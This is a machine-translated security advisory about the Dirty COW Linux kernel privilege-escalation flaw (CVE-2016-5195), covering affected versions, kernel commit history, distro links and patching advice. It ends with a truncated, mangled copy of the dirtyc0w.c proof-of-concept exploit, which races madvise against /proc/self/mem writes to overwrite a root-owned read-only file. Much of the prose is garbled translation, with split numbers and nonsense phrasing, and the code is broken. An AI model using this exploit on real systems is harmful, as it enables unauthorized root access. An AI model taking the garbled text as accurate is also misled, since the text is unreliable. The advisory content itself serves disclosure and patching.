CVE-2 0 1 6-5 1 9 5 dirty cattle vulnerability: the Linux kernel through kill to mention the right vulnerability-vulnerability warning-the black bar safety net

2016-10-21T00:00:00
ID MYHACK58:62201680403
Type myhack58
Reporter 佚名
Modified 2016-10-21T00:00:00

Description

! Vulnerability description Vulnerability ID: CVE-2 0 1 6-5 1 9 5 Vulnerability name: dirty cow(Dirty COW) Vulnerability to hazards: a low-rights user can use the vulnerability in the full version of the Linux system implemented on a local mention of the right to Impact scope: The Linux kernel>=2.6.22 for 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair. 3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected Why is this vulnerability called dirty cattle(Dirty COW)vulnerability? The Linux kernel's memory subsystem in a processing-on-write copies the Copy-on-Write)when the existence conditions of competitive vulnerability, the result can be destruction of private read-only memory mapping. A low-privileged local user can exploit this vulnerability to obtain additional read-only memory-mapped write permission, it is possible to lead to further mention the right vulnerability. Vulnerability details Vulnerability details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails According to the RedHat company reports: the current has been found in the wild for this vulnerability the use of technology. But so far, we have no further news. https://access.redhat.com/security/vulnerabilities/2706661 Commit messages: commit 4ceb5db9757aaeadcf8fbbf97d76bd42aa4df0d6 Author: Linus Torvalds Date: Mon Aug 1 1 1:1 4:4 9 2 0 0 5 -0700 Fix get_user_pages()with write access to the competitive conditions If an update from the other end of the thread to modify the page table, the handle_mm_fault()will likely end the need for us to re-operation. handle_mm_fault()is no real protection has been able to destroy the COW on. This look is nice, but get_user_pages()after the end of the re-read, so that get_user_pages()has been rewritten, need dirty bit is set, the most simple solution to the competitive conditions of the approach is that if the COW break for some reason fails, we can continue the cycle to continue to try. commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 Author: Linus Torvalds Date: Thu Oct 1 3 2 0:0 7:3 6 2 0 1 6 GMT This is an age-old BUG, I was in 7 years ago already tried to fix once before a commit 4ceb5db9757a, but due to some issues commit f33ea7f404e5 and roll back. This time, we pte_dirty()bit to do the testing. Linux is the release version for the vulnerability related information Red Hat: The https://access.redhat.com/security/cve/cve-2016-5195 Debian: the https://security-tracker.debian.org/tracker/CVE-2016-5195 Ubuntu: the http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html The affected area This vulnerability since kernel 2. 6. 2 2 of 2 0 0 7 annual offerings beginning on the affected, until the 2 0 1 6 years 1 0 months 1 8 days to repair. How to fix the vulnerability? The Linux team is working actively to fix this vulnerability, update to the latest release fix this vulnerability. Software developers can also https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/it? id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 Re-compile Linux to fix this vulnerability. How to find someone using the exploit to attack me? The use of this Bug is not in the log in the left exception information. But part of the security community has been to deploy a honeypot, if an attacker exploited this vulnerability, it will trigger the alarm. Who found this vulnerability? Phil Oester (https://access.redhat.com/security/cve/CVE-2016-5195) For the vulnerability the author even application Independent: the website, twitter account, github account, and looking for someone to design a Logo The author of this explanation is: we build brands vulnerability is full of fun, but maybe at this point in time, this is not a good idea. But in order to show our position, I only create a website, online shop, twiiter account, as well as ask a professional designer for this vulnerability to design a LOGO. 2016.10.21 1 3:3 7 update vulnerability scope: 3 6 0 Vulpecker Team: Android 7. 0 latest 1 0 On patch the security level of the system on test through vulnerability POC, confirm that the Android affected ! 2016.10.21 9:1 0 update POC of: POC address: https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c /*

################# dirtyc0w. c#######################

$ sudo-s

echo this is not a test > foo

chmod 0 4 0 4 foo

$ ls-lah foo -r-----r-- 1 root root 1 9 Oct 2 0 1 5:2 3 foo $ cat foo this is not a test $ gcc-lpthread dirtyc0w. c-o dirtyc0w $ ./ dirtyc0w foo m00000000000000000 mmap 5 6 1 2 3 0 0 0 madvise 0 procselfmem 1 8 0 0 0 0 0 0 0 0 $ cat foo m00000000000000000

################# dirtyc0w. c#######################

*/

include

include

include

include

include

void map; int f; struct stat st; char name;

void madviseThread(void arg) { char str; str=(char)arg; int i,c=0; for(i=0;i { / You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661 > This is achieved by racing the madvise(MADV_DONTNEED) system call > while having the page of the executable mmapped in memory. / c+=madvise(map,1 0 0,MADV_DONTNEED); } printf("madvise %d\n\n",c); }

void procselfmemThread(void arg) { char str; str=(char)arg; /* You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16 > The in the wild exploit we are aware of doesn't work on Red Hat

[1] [2] next